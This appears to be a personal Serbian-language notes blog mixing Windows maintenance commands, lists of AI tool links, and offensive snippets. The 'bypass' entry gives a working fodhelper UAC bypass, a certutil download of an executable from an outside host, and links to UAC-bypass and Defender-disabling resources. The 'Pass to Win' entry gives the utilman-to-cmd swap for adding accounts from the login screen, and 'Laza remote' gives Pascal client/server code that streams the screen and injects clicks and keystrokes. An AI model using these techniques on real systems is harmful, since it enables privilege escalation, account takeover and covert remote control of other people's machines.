ITnauka ИТнаука

Tuesday, June 24, 2025

Excel remoter

Sunday, June 8, 2025

ZoneAlarm Goodies

https://www.zonealarm.com/software/free-antivirus

https://www.zonealarm.com/software/free-firewall

Friday, June 6, 2025

bypass

Powershell:

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force

---------------------------------------------------

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

---------------------------------------------------

WmiObject Win32_UserAccount -filter "LocalAccount=True" | Select-Object Name, FullName, Disabled

//Cmd => fodhelper

start cmd

type and run fodhelper in cmd prompt

now you have Admin cmd prompt open.

msiexec /quiet /qn /i sample2.msi

https://www.datacamp.com

https://www.makeuseof.com/hacks-stop-ssd-from-dying-prematurely

https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1

https://github.com/gemini-security

https://github.com/winscripting/UAC-bypass

https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1

https://www.alteredsecurity.com/post/disabling-tamper-protection-and-other-defender-mde-components

https://github.com/hfiref0x/UACME

https://remnux.org

https://vx-underground.org

https://learn.microsoft.com/en-us/windows/win32/api/

https://github.com/screeck/YouTube

whoami /groups

whoami /priv

https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/

https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/

certutil -urlcache -split -f https://mojsajt.com/rad.exe

C:\Windows\System32\cmd.exe /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Program Files (x86)\yourprograme.exe""

https://blog.51sec.org/2021/02/windows-powershell-script-collection.html?expand_article=1

startuj.bat=

Set __COMPAT_LAYER=RunAsInvoker

Start 7z2301-x64.exe

ili

cmd.exe /c "set __COMPAT_LAYER=RunAsInvoker && 7z2301-x64.exe"

Saturday, May 31, 2025

Pass to Win -Capybara

cd Windows

ren cmd.exe utilman2.exe

ren utilman.exe cmd.exe

ren utilman2.exe utilman.exe

easy access icon

net user joe joe /add

netplwiz

https://seostudio.tools

Win + R

cmd {Run As Administrator}

sfc /scannow

DISM /Online /Cleanup-Image /RestoreHealth

sfc /scannow

Seneca once said, "Speech is silver, but silence is golden."

revshells.com

https://remnux.org

cmstp.exe /ni /s c:\cmstp\CorpVPN.inf

https://lolbas-project.github.io/lolbas/Binaries/Cmstp/

Tuesday, May 27, 2025

Windows Update from CMD

winget upgrade

winget upgrade --all

dism /online /cleanup-image /restorehealth

sfc /scannow

Win + S

cmd

del /q/f/s %temp%\*

sfc /scannow

Win + R

cleanmgr

Win + S

cmd

Run as Administrator

del /f "c:\Users\User\Document1.docx"

[it is force delete of file in Windows]

New Shortcut

slidetoshutdown

chkdsk E: /f /r /x

https://app.emergent.sh

https://aistudio.google.com/app/apikey

https://huggingface.co/spaces/Trudy/gemini-3d-drawing

https://uiverse.io

https://appalchemy.ai

https://www.recraft.ai

https://readdy.ai

https://tinywow.com

https://autodraw.com

https://imagineexplainers.com

https://mult.dev

https://www.framer.com

https://bestfreeaiwebsites.com

https://magiceraser.pro

https://10015.io

https://www.codedex.io

https://looka.com

https://pdf.wondershare.com

https://bolt.new

https://enzostvs-deepsite.hf.space

https://remove.photos

https://flourish.studio

https://projectdiscovery.io/nuclei

https://github.com/projectdiscovery/nuclei

https://durable.co

https://www.lingohut.com/en

https://www.copy.ai

ls -larth

Sunday, May 25, 2025

Laza remote

https://youtu.be/EXzfnaFpfJY?si=W_MmNgnz8N6GdVJ6

✅ 1. KLIJENT

📄 `unit1.pas` (Klijent)


unit Unit1;

{$mode objfpc}{$H+}

interface

uses
  Classes, SysUtils, Forms, Controls, ExtCtrls, IdTCPClient, IdGlobal, Graphics,
  Dialogs, Windows, LCLIntf, LCLType, Jpeg;

type
  TForm1 = class(TForm)
    IdTCPClient1: TIdTCPClient;
    Timer1: TTimer;
    procedure FormCreate(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
  private
    procedure CaptureScreenToJPEG(Stream: TMemoryStream);
    procedure ListenForCommands;
    procedure ExecuteRemoteCommand(const Cmd: string);
  public
  end;

var
  Form1: TForm1;

implementation

{$R *.lfm}

procedure TForm1.CaptureScreenToJPEG(Stream: TMemoryStream);
var
  bmp: TBitmap;
  jpg: TJPEGImage;
  DC: HDC;
begin
  bmp := TBitmap.Create;
  jpg := TJPEGImage.Create;
  try
    bmp.Width := Screen.Width;
    bmp.Height := Screen.Height;
    DC := GetDC(0);
    BitBlt(bmp.Canvas.Handle, 0, 0, bmp.Width, bmp.Height, DC, 0, 0, SRCCOPY);
    ReleaseDC(0, DC);
    jpg.Assign(bmp);
    jpg.CompressionQuality := 50;
    jpg.SaveToStream(Stream);
  finally
    bmp.Free;
    jpg.Free;
  end;
end;

procedure TForm1.Timer1Timer(Sender: TObject);
var
  ms: TMemoryStream;
begin
  ms := TMemoryStream.Create;
  try
    CaptureScreenToJPEG(ms);
    ms.Position := 0;

    try
      IdTCPClient1.ConnectTimeout := 2000;
      IdTCPClient1.Connect;
      IdTCPClient1.IOHandler.WriteLn(IntToStr(ms.Size));
      IdTCPClient1.IOHandler.Write(ms, ms.Size);
      IdTCPClient1.Disconnect;
    except
      // greška u konekciji, ignoriši
    end;
  finally
    ms.Free;
  end;

  ListenForCommands;
end;

procedure TForm1.ListenForCommands;
begin
  try
    IdTCPClient1.Host := '127.0.0.1'; // IP servera
    IdTCPClient1.Port := 9001;
    IdTCPClient1.ConnectTimeout := 2000;
    IdTCPClient1.Connect;
    while IdTCPClient1.Connected do
    begin
      ExecuteRemoteCommand(IdTCPClient1.IOHandler.ReadLn);
    end;
  except
    // bez konekcije
  end;
end;

procedure TForm1.ExecuteRemoteCommand(const Cmd: string);
var
  x, y: Integer;
begin
  if Pos('CLICK', Cmd) = 1 then
  begin
    x := StrToIntDef(ExtractWord(2, Cmd, [' ']), 0);
    y := StrToIntDef(ExtractWord(3, Cmd, [' ']), 0);
    SetCursorPos(x, y);
    mouse_event(MOUSEEVENTF_LEFTDOWN or MOUSEEVENTF_LEFTUP, 0, 0, 0, 0);
  end
  else if Pos('KEY', Cmd) = 1 then
  begin
    keybd_event(StrToIntDef(ExtractWord(2, Cmd, [' ']), 0), 0, 0, 0);
    keybd_event(StrToIntDef(ExtractWord(2, Cmd, [' ']), 0), 0, KEYEVENTF_KEYUP, 0);
  end;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
  IdTCPClient1.Host := '127.0.0.1';
  IdTCPClient1.Port := 9000;
  Timer1.Interval := 1000;
  Timer1.Enabled := True;
end;

end.

📄 `unit1.lfm` (forma za klijenta)


object Form1: TForm1
  Caption = 'Remote Client'
  ClientHeight = 120
  ClientWidth = 200
  OnCreate = FormCreate
  object IdTCPClient1: TIdTCPClient
    Port = 9000
    Host = '127.0.0.1'
  end
  object Timer1: TTimer
    Interval = 1000
    OnTimer = Timer1Timer
  end
end

✅ 2. SERVER

📄 `unit1.pas` (Server)


unit Unit1;

{$mode objfpc}{$H+}

interface

uses
  Classes, SysUtils, Forms, Controls, Graphics, Dialogs, ExtCtrls,
  IdTCPServer, IdContext, IdGlobal, StdCtrls, Windows, LCLIntf, LCLType, Jpeg;

type
  TForm1 = class(TForm)
    IdTCPServer1: TIdTCPServer;
    Image1: TImage;
    procedure FormCreate(Sender: TObject);
    procedure IdTCPServer1Execute(AContext: TIdContext);
    procedure Image1MouseDown(Sender: TObject; Button: TMouseButton;
      Shift: TShiftState; X, Y: Integer);
    procedure FormKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState);
  private
    procedure SendCommandToClient(const Cmd: string);
  public
  end;

var
  Form1: TForm1;
  ClientContext: TIdContext = nil;

implementation

{$R *.lfm}

procedure TForm1.FormCreate(Sender: TObject);
begin
  IdTCPServer1.DefaultPort := 9000;
  IdTCPServer1.Active := True;
  Self.KeyPreview := True;
end;

procedure TForm1.IdTCPServer1Execute(AContext: TIdContext);
var
  SizeStr: string;
  ImgStream: TMemoryStream;
  JPEG: TJPEGImage;
  Size: Integer;
begin
  ClientContext := AContext;

  SizeStr := AContext.Connection.IOHandler.ReadLn;
  Size := StrToIntDef(SizeStr, 0);
  if Size <= 0 then Exit;

  ImgStream := TMemoryStream.Create;
  JPEG := TJPEGImage.Create;
  try
    AContext.Connection.IOHandler.ReadStream(ImgStream, Size, False);
    ImgStream.Position := 0;
    JPEG.LoadFromStream(ImgStream);
    Image1.Picture.Assign(JPEG);
  finally
    JPEG.Free;
    ImgStream.Free;
  end;
end;

procedure TForm1.Image1MouseDown(Sender: TObject; Button: TMouseButton;
  Shift: TShiftState; X, Y: Integer);
begin
  SendCommandToClient('CLICK ' + IntToStr(X) + ' ' + IntToStr(Y));
end;

procedure TForm1.FormKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState);
begin
  SendCommandToClient('KEY ' + IntToStr(Key));
end;

procedure TForm1.SendCommandToClient(const Cmd: string);
begin
  if Assigned(ClientContext) then
  begin
    try
      ClientContext.Connection.IOHandler.WriteLn(Cmd);
    except
      // greška prilikom slanja komande
    end;
  end;
end;

end.

📄 `unit1.lfm` (forma za server)


object Form1: TForm1
  Caption = 'Remote Server'
  ClientHeight = 500
  ClientWidth = 800
  OnCreate = FormCreate
  OnKeyDown = FormKeyDown
  KeyPreview = True
  object Image1: TImage
    Align = alClient
    OnMouseDown = Image1MouseDown
  end
  object IdTCPServer1: TIdTCPServer
    DefaultPort = 9000
    OnExecute = IdTCPServer1Execute
  end
end

📌 Napomena:

Server prima slike i prikazuje ih, a klik/tastatura šalje natrag klijentu kroz TCP konekciju.
Trenutno je ClientContext memorisan globalno – ovo funkcioniše ako je samo jedan klijent, za više klijenata bi trebalo održavati listu konekcija.
IP adrese i portovi se mogu menjati prema tvojoj mrežnoj konfiguraciji.